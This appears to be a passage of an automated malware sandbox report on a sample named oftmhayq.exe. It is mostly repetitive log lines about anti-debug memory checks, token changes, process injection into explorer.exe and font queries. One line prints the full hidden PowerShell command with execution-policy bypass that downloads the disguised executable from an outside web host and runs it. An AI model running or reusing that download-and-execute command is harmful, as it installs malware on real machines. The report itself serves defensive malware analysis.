          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D354C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D354C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0138FD52 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01313D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01353540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01383D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01388D47 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01301DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01301DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01301DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013065A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013065A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013065A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01302581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D3591 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01388DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013095EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D95F0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D95F0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0138FDD3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D15C1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01303C3E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D4439 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EB433 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EB433 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012EB433 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F2430 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F2430 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A8C14 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_013A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012D8410 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_01315C70 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_012F746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\Public\oftmhayq.exeCode function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\Public\oftmhayq.exeProcess token adjusted: Debug
          Source: C:\Users\Public\oftmhayq.exeProcess token adjusted: Debug
          Source: C:\Users\Public\oftmhayq.exeProcess token adjusted: Debug
          Source: C:\Users\Public\oftmhayq.exeProcess token adjusted: Debug
          Source: C:\Users\Public\oftmhayq.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          Bypasses PowerShell execution policyShow sources
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\oftmhayq.exeMemory written: C:\Users\Public\oftmhayq.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\Public\oftmhayq.exeMemory written: C:\Users\Public\oftmhayq.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\oftmhayq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\Public\oftmhayq.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\oftmhayq.exeThread register set: target process: 3388
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\oftmhayq.exeThread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe'
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe'
          Source: C:\Users\Public\oftmhayq.exeProcess created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe
          Source: C:\Users\Public\oftmhayq.exeProcess created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe
          Source: explorer.exe, 0000001F.00000002.530564683.0000000001980000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 0000001F.00000000.506248785.0000000006860000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 0000001F.00000002.530564683.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 0000001F.00000002.530564683.0000000001980000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Users\Public\oftmhayq.exe VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
          Source: C:\Users\Public\oftmhayq.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
